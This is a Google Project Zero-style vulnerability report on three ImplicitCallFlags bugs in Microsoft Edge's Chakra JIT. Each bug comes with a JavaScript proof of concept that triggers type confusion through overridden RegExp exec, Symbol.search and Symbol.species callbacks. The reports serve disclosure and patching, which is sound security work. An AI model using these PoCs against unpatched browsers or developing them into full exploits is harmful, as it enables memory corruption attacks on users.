Microsoft Edge Chakra JIT ImplicitCallFlags Update Bugs

Microsoft Edge: Chakra: JIT: Multiple ImplicitCallFlags update bugs with RegExp




The same bug class with <a href="/p/project-zero/issues/detail?id=1334&quo Microsoft Edge: Chakra: JIT: Multiple ImplicitCallFlags update bugs with RegExp




The same bug class with <a href="/p/project-zero/issues/detail?id=1334" title="Microsoft Edge: Chakra: JIT: RegexHelper::StringReplace must call the callback function with updating ImplicitCallFlags" class="closed_ref" rel="nofollow"> issue 1334 </a>(MSRC-40170).

1. Calling RegExp.prototype.exec without updating the "ImplicitCallFlags" flag in "JavascriptRegExp::CallExec".

function opt(arr, re) {
arr[0] = 1.1;
'a'.match(re);
arr[0] = 2.3023e-320;
}

function main() {
let arr = [1.1, 2.2, 3.3];
let re = /a/;
for (let i = 0; i < 0x2000; i++) {
opt(arr, re);
}

re.exec = function () {
arr[0] = {};
return null;
};

opt(arr, re);
print(arr[0]);

}

main();

2. Calling RegExp.prototype[Symbol.search] without updating the "ImplicitCallFlags" flag in "JavascriptString::CallRegExFunction".

function opt(arr, re) {
arr[0] = 1.1;
let r = 'a'.search(re);
arr[0] = 2.3023e-320;
}

function main() {
let arr = [1.1, 2.2, 3.3];
let re = /a/;
for (let i = 0; i < 0x2000; i++) {
opt(arr, re);
}

re[Symbol.search] = function () {
arr[0] = {};
return 0;
};

opt(arr, re);
print(arr[0]);

}

main();

3. Calling Symbol.species without updating the "ImplicitCallFlags" flag in "RegexHelper::RegexEs6SplitImpl".

function opt(arr, re) {
arr[0] = 1.1;
'a'.split(re);
arr[0] = 2.3023e-320;
}

function main() {
let arr = [1.1, 2.2, 3.3];
let re = /a/;
for (let i = 0; i < 0x2000; i++) {
opt(arr, re);
}

re.constructor = {
[Symbol.species]: function () {
arr[0] = {};
return /a/;
}
};

opt(arr, re);
print(arr[0]);

}

main();



This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.




Found by: lokihardt